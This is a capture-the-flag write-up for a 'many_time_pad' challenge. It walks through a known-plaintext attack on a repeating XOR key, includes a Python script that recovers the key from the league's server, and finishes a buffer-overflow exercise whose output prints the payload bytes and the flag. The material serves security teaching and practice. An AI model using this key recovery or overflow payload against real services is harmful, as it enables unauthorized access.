# many_time_pad

For this challenge, we're given a link to a website that appears to be some kind of an encryption service. It asks for a 256-character message to encrypt, and says it will encrypt the message with a secret key and put the encrypted result in the response headers. It also gives us a link to the [source](source.py). 

After taking a look at the source code, it looks like the server just XOR's every character of the message with the corresponding character of the secret key and then puts the result as a byte string in the "ciphertext" response header:

```python
def encrypt():
   #truncate message if longer than 256 bytes, convert to byte string
   plaintext = request.form.get("message")[:256].encode()
   #pad message with \xff bytes
   plaintext += b'\xff' * (256 - len(plaintext))
   #xor byte string with secret key
   ciphertext = bytes([plaintext_byte ^ key_byte for plaintext_byte, key_byte in zip(plaintext, cfg.secret_byte_string)])
   #put the ciphertext in a response header
   resp = make_response(render_template("index.html"))
   resp.headers["ciphertext"] = repr(ciphertext)
   return resp
```

XOR is a reversible operation (if `A ^ B = C`, then `C ^ A = B`), so it's pretty easy to recover the secret key. We can just XOR our original plaintext with the ciphertext we get from the server to recover the secret key! Here's a quick Python script that gets the job done:

```python
import requests

url = "http://ctf-league.osusec.org:31308/encrypt"
payload = {'message':'a'*256}

resp = requests.post(url, data=payload)

print(resp.headers['ciphertext'])

ciphertext = eval(resp.headers['ciphertext'])

key = bytes([plaintext_byte ^ ciphertext_byte for plaintext_byte, ciphertext_byte in zip(b'a'*256, ciphertext)])

print(key)
```

Running the script, we get this output:

```
b'if-you-tried-to-dirbuster-this-route-I-will-forward-you-the-OSUSEC-AWS-bill-never-gonna-give-you-up-never-gonna-let-you-down-never-gonna-run-around-and-desert-you-never-gonna-make-you-cry-never-gonna-say-goodbye-never-gonna-tell-a-lie-and-hurt-you-12345678'
```

Accessing [that route](http://ctf-league.osusec.org:31308/if-you-tried-to-dirbuster-this-route-I-will-forward-you-the-OSUSEC-AWS-bill-never-gonna-give-you-up-never-gonna-let-you-down-never-gonna-run-around-and-desert-you-never-gonna-make-you-cry-never-gonna-say-goodbye-never-gonna-tell-a-lie-and-hurt-you-12345678), we get another site. This time it looks like a tutorial for how to play in the OSU CTF league! There's a [practice binary](my_first_pwn) and a [sample script](helpful_script.py). Looks like we only need three things to fill in the blanks for the script: the size of the buffer we can overflow, the address of the printflag function, and the secret key string. We already know the secret key string, and we can find the rest pretty easily with Ghidra:

![decompilation](decomp.png)

![address](address.png)

After filling out the [script](helpful_script.py) and running it, we get the flag!

```
$ python3 helpful_script.py
[+] Opening connection to ctf-league.osusec.org on port 31309: Done
b'enter the secret key from the web portion of this challenge'
sending the key string: if-you-tried-to-dirbuster-this-route-I-will-forward-you-the-OSUSEC-AWS-bill-never-gonna-give-you-up-never-gonna-let-you-down-never-gonna-run-around-and-desert-you-never-gonna-make-you-cry-never-gonna-say-goodbye-never-gonna-tell-a-lie-and-hurt-you-12345678
response:

b'payload: AAAAAAAAAAAAAAAABBBBBBBBG\x06@\x00\x00\x00\x00\x00'
[*] Switching to interactive mode
overflow my buffer and return to the print_the_flag function
osu{L0N6_W01f_H^x0r}

[*] Got EOF while reading in interactive
```
